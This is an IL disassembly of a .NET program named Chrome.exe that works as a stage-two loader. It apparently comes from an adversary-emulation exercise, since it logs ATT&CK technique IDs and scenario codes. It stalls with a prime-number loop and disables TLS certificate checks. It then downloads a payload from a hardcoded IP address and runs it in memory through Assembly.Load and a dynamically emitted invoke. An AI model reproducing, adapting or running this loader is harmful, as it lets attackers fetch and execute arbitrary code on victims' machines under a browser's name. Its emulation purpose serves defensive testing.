
//  Microsoft (R) .NET Framework IL Disassembler.  Version 4.8.3928.0
//  Copyright (c) Microsoft Corporation.  All rights reserved.



// Metadata version: v4.0.30319
.assembly extern mscorlib
{
  .publickeytoken = (B7 7A 5C 56 19 34 E0 89 )                         // .z\V.4..
  .ver 4:0:0:0
}
.assembly extern System
{
  .publickeytoken = (B7 7A 5C 56 19 34 E0 89 )                         // .z\V.4..
  .ver 4:0:0:0
}
.assembly Chrome
{
  .custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = ( 01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78   // ....T..WrapNonEx
                                                                                                             63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 )       // ceptionThrows.
  .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::.ctor(int32) = ( 01 00 08 00 00 00 00 00 ) 
  .hash algorithm 0x00008004
  .ver 0:0:0:0
}
.module Chrome.exe
// MVID: {DD72967E-8A50-42FF-910B-693E28989756}
.imagebase 0x00400000
.file alignment 0x00000200
.stackreserve 0x00100000
.subsystem 0x0003       // WINDOWS_CUI
.corflags 0x00000001    //  ILONLY
// Image base: 0x06D20000


// =============== CLASS MEMBERS DECLARATION ===================

.class private auto ansi beforefieldinit Loader_net.Chrome
       extends [mscorlib]System.Object
{
  .field private static class [System]System.Net.Security.RemoteCertificateValidationCallback 'CS$<>9__CachedAnonymousMethodDelegate1'
  .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
  .method private hidebysig static void  Main(string[] args) cil managed
  {
    .entrypoint
    // Code size       477 (0x1dd)
    .maxstack  7
    .locals init (uint8[] V_0,
             string[] V_1,
             object V_2,
             object[] V_3,
             class [mscorlib]System.Reflection.Emit.DynamicMethod V_4,
             class [mscorlib]System.Reflection.Emit.ILGenerator V_5,
             bool V_6,
             string[] V_7,
             object[] V_8,
             class [mscorlib]System.Type[] V_9)
    IL_0000:  nop
    IL_0001:  ldstr      "T1027.004"
    IL_0006:  ldstr      "1"
    IL_000b:  call       void Loader_net.Reporter::WriteLog(string,
                                                            string)
    IL_0010:  nop
    IL_0011:  ldc.i4     0xaae60
    IL_0016:  call       void Loader_net.Chrome::delay(int32)
    IL_001b:  nop
    IL_001c:  ldstr      "Empezando"
    IL_0021:  call       void [mscorlib]System.Console::WriteLine(string)
    IL_0026:  nop
    IL_0027:  call       uint8[] Loader_net.Chrome::loadStage2()
    IL_002c:  stloc.0
    IL_002d:  ldloc.0
    IL_002e:  ldlen
    IL_002f:  conv.i4
    IL_0030:  ldc.i4.0
    IL_0031:  ceq
    IL_0033:  ldc.i4.0
    IL_0034:  ceq
    IL_0036:  stloc.s    V_6
    IL_0038:  ldloc.s    V_6
    IL_003a:  brtrue.s   IL_0042

    IL_003c:  nop
    IL_003d:  br         IL_01dc

    IL_0042:  ldstr      "T1105"
    IL_0047:  ldstr      "1"
    IL_004c:  call       void Loader_net.Reporter::WriteLog(string,
                                                            string)
    IL_0051:  nop
    IL_0052:  ldc.i4.1
    IL_0053:  newarr     [mscorlib]System.String
    IL_0058:  stloc.s    V_7
    IL_005a:  ldloc.s    V_7
    IL_005c:  ldc.i4.0
    IL_005d:  ldstr      ""
    IL_0062:  stelem.ref
    IL_0063:  ldloc.s    V_7
    IL_0065:  stloc.1
    IL_0066:  newobj     instance void [mscorlib]System.Object::.ctor()
    IL_006b:  stloc.2
    IL_006c:  ldc.i4.1
    IL_006d:  newarr     [mscorlib]System.Object
    IL_0072:  stloc.s    V_8
    IL_0074:  ldloc.s    V_8
    IL_0076:  ldc.i4.0
    IL_0077:  ldloc.1
    IL_0078:  stelem.ref
    IL_0079:  ldloc.s    V_8
    IL_007b:  stloc.3
    IL_007c:  ldstr      "_Invoke"
    IL_0081:  ldtoken    [mscorlib]System.Void
    IL_0086:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_008b:  ldc.i4.3
    IL_008c:  newarr     [mscorlib]System.Type
    IL_0091:  stloc.s    V_9
    IL_0093:  ldloc.s    V_9
    IL_0095:  ldc.i4.0
    IL_0096:  ldtoken    uint8[]
    IL_009b:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_00a0:  stelem.ref
    IL_00a1:  ldloc.s    V_9
    IL_00a3:  ldc.i4.1
    IL_00a4:  ldtoken    [mscorlib]System.Object
    IL_00a9:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_00ae:  stelem.ref
    IL_00af:  ldloc.s    V_9
    IL_00b1:  ldc.i4.2
    IL_00b2:  ldtoken    object[]
    IL_00b7:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_00bc:  stelem.ref
    IL_00bd:  ldloc.s    V_9
    IL_00bf:  newobj     instance void [mscorlib]System.Reflection.Emit.DynamicMethod::.ctor(string,
                                                                                             class [mscorlib]System.Type,
                                                                                             class [mscorlib]System.Type[])
    IL_00c4:  stloc.s    V_4
    IL_00c6:  ldloc.s    V_4
    IL_00c8:  callvirt   instance class [mscorlib]System.Reflection.Emit.ILGenerator [mscorlib]System.Reflection.Emit.DynamicMethod::GetILGenerator()
    IL_00cd:  stloc.s    V_5
    IL_00cf:  ldloc.s    V_5
    IL_00d1:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Ldarg_0
    IL_00d6:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::Emit(valuetype [mscorlib]System.Reflection.Emit.OpCode)
    IL_00db:  nop
    IL_00dc:  ldloc.s    V_5
    IL_00de:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Call
    IL_00e3:  ldtoken    [mscorlib]System.Reflection.Assembly
    IL_00e8:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_00ed:  ldstr      "Load"
    IL_00f2:  ldc.i4.1
    IL_00f3:  newarr     [mscorlib]System.Type
    IL_00f8:  stloc.s    V_9
    IL_00fa:  ldloc.s    V_9
    IL_00fc:  ldc.i4.0
    IL_00fd:  ldtoken    uint8[]
    IL_0102:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_0107:  stelem.ref
    IL_0108:  ldloc.s    V_9
    IL_010a:  call       instance class [mscorlib]System.Reflection.MethodInfo [mscorlib]System.Type::GetMethod(string,
                                                                                                                class [mscorlib]System.Type[])
    IL_010f:  ldnull
    IL_0110:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::EmitCall(valuetype [mscorlib]System.Reflection.Emit.OpCode,
                                                                                              class [mscorlib]System.Reflection.MethodInfo,
                                                                                              class [mscorlib]System.Type[])
    IL_0115:  nop
    IL_0116:  ldloc.s    V_5
    IL_0118:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Callvirt
    IL_011d:  ldtoken    [mscorlib]System.Reflection.Assembly
    IL_0122:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_0127:  ldstr      "get_EntryPoint"
    IL_012c:  ldc.i4.0
    IL_012d:  newarr     [mscorlib]System.Type
    IL_0132:  call       instance class [mscorlib]System.Reflection.MethodInfo [mscorlib]System.Type::GetMethod(string,
                                                                                                                class [mscorlib]System.Type[])
    IL_0137:  ldnull
    IL_0138:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::EmitCall(valuetype [mscorlib]System.Reflection.Emit.OpCode,
                                                                                              class [mscorlib]System.Reflection.MethodInfo,
                                                                                              class [mscorlib]System.Type[])
    IL_013d:  nop
    IL_013e:  ldloc.s    V_5
    IL_0140:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Ldarg_1
    IL_0145:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::Emit(valuetype [mscorlib]System.Reflection.Emit.OpCode)
    IL_014a:  nop
    IL_014b:  ldloc.s    V_5
    IL_014d:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Ldarg_2
    IL_0152:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::Emit(valuetype [mscorlib]System.Reflection.Emit.OpCode)
    IL_0157:  nop
    IL_0158:  ldloc.s    V_5
    IL_015a:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Callvirt
    IL_015f:  ldtoken    [mscorlib]System.Reflection.MethodBase
    IL_0164:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_0169:  ldstr      "Invoke"
    IL_016e:  ldc.i4.2
    IL_016f:  newarr     [mscorlib]System.Type
    IL_0174:  stloc.s    V_9
    IL_0176:  ldloc.s    V_9
    IL_0178:  ldc.i4.0
    IL_0179:  ldtoken    [mscorlib]System.Object
    IL_017e:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_0183:  stelem.ref
    IL_0184:  ldloc.s    V_9
    IL_0186:  ldc.i4.1
    IL_0187:  ldtoken    object[]
    IL_018c:  call       class [mscorlib]System.Type [mscorlib]System.Type::GetTypeFromHandle(valuetype [mscorlib]System.RuntimeTypeHandle)
    IL_0191:  stelem.ref
    IL_0192:  ldloc.s    V_9
    IL_0194:  call       instance class [mscorlib]System.Reflection.MethodInfo [mscorlib]System.Type::GetMethod(string,
                                                                                                                class [mscorlib]System.Type[])
    IL_0199:  ldnull
    IL_019a:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::EmitCall(valuetype [mscorlib]System.Reflection.Emit.OpCode,
                                                                                              class [mscorlib]System.Reflection.MethodInfo,
                                                                                              class [mscorlib]System.Type[])
    IL_019f:  nop
    IL_01a0:  ldloc.s    V_5
    IL_01a2:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Pop
    IL_01a7:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::Emit(valuetype [mscorlib]System.Reflection.Emit.OpCode)
    IL_01ac:  nop
    IL_01ad:  ldloc.s    V_5
    IL_01af:  ldsfld     valuetype [mscorlib]System.Reflection.Emit.OpCode [mscorlib]System.Reflection.Emit.OpCodes::Ret
    IL_01b4:  callvirt   instance void [mscorlib]System.Reflection.Emit.ILGenerator::Emit(valuetype [mscorlib]System.Reflection.Emit.OpCode)
    IL_01b9:  nop
    IL_01ba:  ldloc.s    V_4
    IL_01bc:  ldnull
    IL_01bd:  ldc.i4.3
    IL_01be:  newarr     [mscorlib]System.Object
    IL_01c3:  stloc.s    V_8
    IL_01c5:  ldloc.s    V_8
    IL_01c7:  ldc.i4.0
    IL_01c8:  ldloc.0
    IL_01c9:  stelem.ref
    IL_01ca:  ldloc.s    V_8
    IL_01cc:  ldc.i4.1
    IL_01cd:  ldloc.2
    IL_01ce:  stelem.ref
    IL_01cf:  ldloc.s    V_8
    IL_01d1:  ldc.i4.2
    IL_01d2:  ldloc.3
    IL_01d3:  stelem.ref
    IL_01d4:  ldloc.s    V_8
    IL_01d6:  callvirt   instance object [mscorlib]System.Reflection.MethodBase::Invoke(object,
                                                                                        object[])
    IL_01db:  pop
    IL_01dc:  ret
  } // end of method Chrome::Main

  .method private hidebysig static void  delay(int32 n) cil managed
  {
    // Code size       86 (0x56)
    .maxstack  5
    .locals init (class [System]System.Diagnostics.Stopwatch V_0,
             valuetype [mscorlib]System.TimeSpan V_1,
             string V_2)
    IL_0000:  nop
    IL_0001:  newobj     instance void [System]System.Diagnostics.Stopwatch::.ctor()
    IL_0006:  stloc.0
    IL_0007:  ldloc.0
    IL_0008:  callvirt   instance void [System]System.Diagnostics.Stopwatch::Start()
    IL_000d:  nop
    IL_000e:  ldarg.0
    IL_000f:  call       void Loader_net.Chrome::FindPrimeNumber(int32)
    IL_0014:  nop
    IL_0015:  ldloc.0
    IL_0016:  callvirt   instance void [System]System.Diagnostics.Stopwatch::Stop()
    IL_001b:  nop
    IL_001c:  ldloc.0
    IL_001d:  callvirt   instance valuetype [mscorlib]System.TimeSpan [System]System.Diagnostics.Stopwatch::get_Elapsed()
    IL_0022:  stloc.1
    IL_0023:  ldstr      "{0:00}:{1:00}:{2:00}"
    IL_0028:  ldloca.s   V_1
    IL_002a:  call       instance int32 [mscorlib]System.TimeSpan::get_Minutes()
    IL_002f:  box        [mscorlib]System.Int32
    IL_0034:  ldloca.s   V_1
    IL_0036:  call       instance int32 [mscorlib]System.TimeSpan::get_Seconds()
    IL_003b:  box        [mscorlib]System.Int32
    IL_0040:  ldloca.s   V_1
    IL_0042:  call       instance int32 [mscorlib]System.TimeSpan::get_Milliseconds()
    IL_0047:  ldc.i4.s   10
    IL_0049:  div
    IL_004a:  box        [mscorlib]System.Int32
    IL_004f:  call       string [mscorlib]System.String::Format(string,
                                                                object,
                                                                object,
                                                                object)
    IL_0054:  stloc.2
    IL_0055:  ret
  } // end of method Chrome::delay

  .method private hidebysig static uint8[] 
          loadStage2() cil managed
  {
    // Code size       108 (0x6c)
    .maxstack  2
    .locals init (string V_0,
             class [System]System.Net.WebClient V_1,
             uint8[] V_2,
             bool V_3)
    IL_0000:  nop
    IL_0001:  ldsfld     class [System]System.Net.Security.RemoteCertificateValidationCallback Loader_net.Chrome::'CS$<>9__CachedAnonymousMethodDelegate1'
    IL_0006:  brtrue.s   IL_001b

    IL_0008:  ldnull
    IL_0009:  ldftn      bool Loader_net.Chrome::'<loadStage2>b__0'(object,
                                                                    class [mscorlib]System.Security.Cryptography.X509Certificates.X509Certificate,
                                                                    class [System]System.Security.Cryptography.X509Certificates.X509Chain,
                                                                    valuetype [System]System.Net.Security.SslPolicyErrors)
    IL_000f:  newobj     instance void [System]System.Net.Security.RemoteCertificateValidationCallback::.ctor(object,
                                                                                                              native int)
    IL_0014:  stsfld     class [System]System.Net.Security.RemoteCertificateValidationCallback Loader_net.Chrome::'CS$<>9__CachedAnonymousMethodDelegate1'
    IL_0019:  br.s       IL_001b

    IL_001b:  ldsfld     class [System]System.Net.Security.RemoteCertificateValidationCallback Loader_net.Chrome::'CS$<>9__CachedAnonymousMethodDelegate1'
    IL_0020:  call       void [System]System.Net.ServicePointManager::set_ServerCertificateValidationCallback(class [System]System.Net.Security.RemoteCertificateValidationCallback)
    IL_0025:  nop
    IL_0026:  ldstr      "https://3.144.238.187/products/OCELD5702618931a846"
    IL_002b:  stloc.0
    .try
    {
      IL_002c:  nop
      IL_002d:  newobj     instance void [System]System.Net.WebClient::.ctor()
      IL_0032:  stloc.1
      .try
      {
        IL_0033:  nop
        IL_0034:  ldloc.1
        IL_0035:  ldloc.0
        IL_0036:  callvirt   instance uint8[] [System]System.Net.WebClient::DownloadData(string)
        IL_003b:  stloc.2
        IL_003c:  leave.s    IL_0069

      }  // end .try
      finally
      {
        IL_003e:  ldloc.1
        IL_003f:  ldnull
        IL_0040:  ceq
        IL_0042:  stloc.3
        IL_0043:  ldloc.3
        IL_0044:  brtrue.s   IL_004d

        IL_0046:  ldloc.1
        IL_0047:  callvirt   instance void [mscorlib]System.IDisposable::Dispose()
        IL_004c:  nop
        IL_004d:  endfinally
      }  // end handler
    }  // end .try
    catch [mscorlib]System.Object 
    {
      IL_004e:  pop
      IL_004f:  nop
      IL_0050:  ldstr      "T1105"
      IL_0055:  ldstr      "0"
      IL_005a:  call       void Loader_net.Reporter::WriteLog(string,
                                                              string)
      IL_005f:  nop
      IL_0060:  ldc.i4.0
      IL_0061:  newarr     [mscorlib]System.Byte
      IL_0066:  stloc.2
      IL_0067:  leave.s    IL_0069

    }  // end handler
    IL_0069:  nop
    IL_006a:  ldloc.2
    IL_006b:  ret
  } // end of method Chrome::loadStage2

  .method public hidebysig static void  FindPrimeNumber(int32 n) cil managed
  {
    // Code size       95 (0x5f)
    .maxstack  2
    .locals init (int32 V_0,
             int64 V_1,
             int64 V_2,
             int32 V_3,
             bool V_4)
    IL_0000:  nop
    IL_0001:  ldc.i4.0
    IL_0002:  stloc.0
    IL_0003:  ldc.i4.2
    IL_0004:  conv.i8
    IL_0005:  stloc.1
    IL_0006:  br.s       IL_0054

    IL_0008:  nop
    IL_0009:  ldc.i4.2
    IL_000a:  conv.i8
    IL_000b:  stloc.2
    IL_000c:  ldc.i4.1
    IL_000d:  stloc.3
    IL_000e:  br.s       IL_002c

    IL_0010:  nop
    IL_0011:  ldloc.1
    IL_0012:  ldloc.2
    IL_0013:  rem
    IL_0014:  ldc.i4.0
    IL_0015:  conv.i8
    IL_0016:  ceq
    IL_0018:  ldc.i4.0
    IL_0019:  ceq
    IL_001b:  stloc.s    V_4
    IL_001d:  ldloc.s    V_4
    IL_001f:  brtrue.s   IL_0026

    IL_0021:  nop
    IL_0022:  ldc.i4.0
    IL_0023:  stloc.3
    IL_0024:  br.s       IL_003b

    IL_0026:  ldloc.2
    IL_0027:  ldc.i4.1
    IL_0028:  conv.i8
    IL_0029:  add
    IL_002a:  stloc.2
    IL_002b:  nop
    IL_002c:  ldloc.2
    IL_002d:  ldloc.2
    IL_002e:  mul
    IL_002f:  ldloc.1
    IL_0030:  cgt
    IL_0032:  ldc.i4.0
    IL_0033:  ceq
    IL_0035:  stloc.s    V_4
    IL_0037:  ldloc.s    V_4
    IL_0039:  brtrue.s   IL_0010

    IL_003b:  ldloc.3
    IL_003c:  ldc.i4.0
    IL_003d:  cgt
    IL_003f:  ldc.i4.0
    IL_0040:  ceq
    IL_0042:  stloc.s    V_4
    IL_0044:  ldloc.s    V_4
    IL_0046:  brtrue.s   IL_004e

    IL_0048:  nop
    IL_0049:  ldloc.0
    IL_004a:  ldc.i4.1
    IL_004b:  add
    IL_004c:  stloc.0
    IL_004d:  nop
    IL_004e:  ldloc.1
    IL_004f:  ldc.i4.1
    IL_0050:  conv.i8
    IL_0051:  add
    IL_0052:  stloc.1
    IL_0053:  nop
    IL_0054:  ldloc.0
    IL_0055:  ldarg.0
    IL_0056:  clt
    IL_0058:  stloc.s    V_4
    IL_005a:  ldloc.s    V_4
    IL_005c:  brtrue.s   IL_0008

    IL_005e:  ret
  } // end of method Chrome::FindPrimeNumber

  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    // Code size       7 (0x7)
    .maxstack  8
    IL_0000:  ldarg.0
    IL_0001:  call       instance void [mscorlib]System.Object::.ctor()
    IL_0006:  ret
  } // end of method Chrome::.ctor

  .method private hidebysig static bool  '<loadStage2>b__0'(object senderX,
                                                            class [mscorlib]System.Security.Cryptography.X509Certificates.X509Certificate certificate,
                                                            class [System]System.Security.Cryptography.X509Certificates.X509Chain chain,
                                                            valuetype [System]System.Net.Security.SslPolicyErrors sslPolicyErrors) cil managed
  {
    .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
    // Code size       7 (0x7)
    .maxstack  1
    .locals init (bool V_0)
    IL_0000:  nop
    IL_0001:  ldc.i4.1
    IL_0002:  stloc.0
    IL_0003:  br.s       IL_0005

    IL_0005:  ldloc.0
    IL_0006:  ret
  } // end of method Chrome::'<loadStage2>b__0'

} // end of class Loader_net.Chrome

.class private abstract auto ansi sealed beforefieldinit Loader_net.Settings
       extends [mscorlib]System.Object
{
  .field public static string ID
  .field public static bool DEBUG
  .field public static string ESCENARIO
  .field public static string CURRENT_PATH
  .field public static string CommonDocsPath
  .field public static string publicPath
  .field public static string reportPath
  .method private hidebysig specialname rtspecialname static 
          void  .cctor() cil managed
  {
    // Code size       103 (0x67)
    .maxstack  3
    IL_0000:  ldstr      "OCE-DW-05"
    IL_0005:  stsfld     string Loader_net.Settings::ID
    IL_000a:  ldstr      "true"
    IL_000f:  call       bool [mscorlib]System.Boolean::Parse(string)
    IL_0014:  stsfld     bool Loader_net.Settings::DEBUG
    IL_0019:  ldstr      "OCE-SCE-57"
    IL_001e:  stsfld     string Loader_net.Settings::ESCENARIO
    IL_0023:  ldstr      "System.Diagnostics.Process.GetCurrentProcess().Mai"
    + "nModule.FileName"
    IL_0028:  stsfld     string Loader_net.Settings::CURRENT_PATH
    IL_002d:  ldc.i4.s   46
    IL_002f:  call       string [mscorlib]System.Environment::GetFolderPath(valuetype [mscorlib]System.Environment/SpecialFolder)
    IL_0034:  stsfld     string Loader_net.Settings::CommonDocsPath
    IL_0039:  ldsfld     string Loader_net.Settings::CommonDocsPath
    IL_003e:  call       string [mscorlib]System.IO.Path::GetDirectoryName(string)
    IL_0043:  stsfld     string Loader_net.Settings::publicPath
    IL_0048:  ldsfld     string Loader_net.Settings::publicPath
    IL_004d:  ldsfld     string Loader_net.Settings::ESCENARIO
    IL_0052:  ldstr      ".txt"
    IL_0057:  call       string [mscorlib]System.String::Concat(string,
                                                                string)
    IL_005c:  call       string [mscorlib]System.IO.Path::Combine(string,
                                                                  string)
    IL_0061:  stsfld     string Loader_net.Settings::reportPath
    IL_0066:  ret
  } // end of method Settings::.cctor

} // end of class Loader_net.Settings

.class private auto ansi beforefieldinit Loader_net.Reporter
       extends [mscorlib]System.Object
{
  .field public static class [mscorlib]System.IO.MemoryStream 'stream'
  .field public static class [mscorlib]System.IO.StreamWriter writer
  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    // Code size       10 (0xa)
    .maxstack  8
    IL_0000:  ldarg.0
    IL_0001:  call       instance void [mscorlib]System.Object::.ctor()
    IL_0006:  nop
    IL_0007:  nop
    IL_0008:  nop
    IL_0009:  ret
  } // end of method Reporter::.ctor

  .method public hidebysig static void  WriteLog(string id,
                                                 string description) cil managed
  {
    // Code size       93 (0x5d)
    .maxstack  5
    .locals init (string V_0,
             bool V_1,
             object[] V_2,
             valuetype [mscorlib]System.DateTime V_3)
    IL_0000:  nop
    IL_0001:  ldarg.0
    IL_0002:  ldstr      "0"
    IL_0007:  callvirt   instance bool [mscorlib]System.String::Equals(string)
    IL_000c:  brfalse.s  IL_0015

    IL_000e:  ldsfld     bool Loader_net.Settings::DEBUG
    IL_0013:  br.s       IL_0016

    IL_0015:  ldc.i4.1
    IL_0016:  nop
    IL_0017:  stloc.1
    IL_0018:  ldloc.1
    IL_0019:  brtrue.s   IL_001d

    IL_001b:  br.s       IL_005c

    IL_001d:  ldstr      "[{0}] [{1}] [{2}] [{3}]\n\r"
    IL_0022:  ldc.i4.4
    IL_0023:  newarr     [mscorlib]System.Object
    IL_0028:  stloc.2
    IL_0029:  ldloc.2
    IL_002a:  ldc.i4.0
    IL_002b:  call       valuetype [mscorlib]System.DateTime [mscorlib]System.DateTime::get_Now()
    IL_0030:  stloc.3
    IL_0031:  ldloca.s   V_3
    IL_0033:  ldstr      "dd/MM/yyyy HH:mm:ss"
    IL_0038:  call       instance string [mscorlib]System.DateTime::ToString(string)
    IL_003d:  stelem.ref
    IL_003e:  ldloc.2
    IL_003f:  ldc.i4.1
    IL_0040:  ldsfld     string Loader_net.Settings::ID
    IL_0045:  stelem.ref
    IL_0046:  ldloc.2
    IL_0047:  ldc.i4.2
    IL_0048:  ldarg.0
    IL_0049:  stelem.ref
    IL_004a:  ldloc.2
    IL_004b:  ldc.i4.3
    IL_004c:  ldarg.1
    IL_004d:  stelem.ref
    IL_004e:  ldloc.2
    IL_004f:  call       string [mscorlib]System.String::Format(string,
                                                                object[])
    IL_0054:  stloc.0
    IL_0055:  ldloc.0
    IL_0056:  call       void Loader_net.Reporter::FileLog(string)
    IL_005b:  nop
    IL_005c:  ret
  } // end of method Reporter::WriteLog

  .method public hidebysig static void  FileLog(string description) cil managed
  {
    // Code size       47 (0x2f)
    .maxstack  4
    .locals init (class [mscorlib]System.IO.FileStream V_0,
             uint8[] V_1)
    IL_0000:  nop
    IL_0001:  ldsfld     string Loader_net.Settings::reportPath
    IL_0006:  ldc.i4.6
    IL_0007:  call       class [mscorlib]System.IO.FileStream [mscorlib]System.IO.File::Open(string,
                                                                                             valuetype [mscorlib]System.IO.FileMode)
    IL_000c:  stloc.0
    IL_000d:  call       class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
    IL_0012:  ldarg.0
    IL_0013:  callvirt   instance uint8[] [mscorlib]System.Text.Encoding::GetBytes(string)
    IL_0018:  stloc.1
    IL_0019:  ldloc.0
    IL_001a:  ldloc.1
    IL_001b:  ldc.i4.0
    IL_001c:  ldloc.1
    IL_001d:  ldlen
    IL_001e:  conv.i4
    IL_001f:  callvirt   instance void [mscorlib]System.IO.Stream::Write(uint8[],
                                                                         int32,
                                                                         int32)
    IL_0024:  nop
    IL_0025:  ldloc.0
    IL_0026:  callvirt   instance void [mscorlib]System.IO.Stream::Close()
    IL_002b:  nop
    IL_002c:  br.s       IL_002e

    IL_002e:  ret
  } // end of method Reporter::FileLog

  .method private hidebysig specialname rtspecialname static 
          void  .cctor() cil managed
  {
    // Code size       26 (0x1a)
    .maxstack  8
    IL_0000:  newobj     instance void [mscorlib]System.IO.MemoryStream::.ctor()
    IL_0005:  stsfld     class [mscorlib]System.IO.MemoryStream Loader_net.Reporter::'stream'
    IL_000a:  ldsfld     class [mscorlib]System.IO.MemoryStream Loader_net.Reporter::'stream'
    IL_000f:  newobj     instance void [mscorlib]System.IO.StreamWriter::.ctor(class [mscorlib]System.IO.Stream)
    IL_0014:  stsfld     class [mscorlib]System.IO.StreamWriter Loader_net.Reporter::writer
    IL_0019:  ret
  } // end of method Reporter::.cctor

} // end of class Loader_net.Reporter


// =============================================================

// *********** DISASSEMBLY COMPLETE ***********************
// WARNING: Created Win32 resource file pickle.res
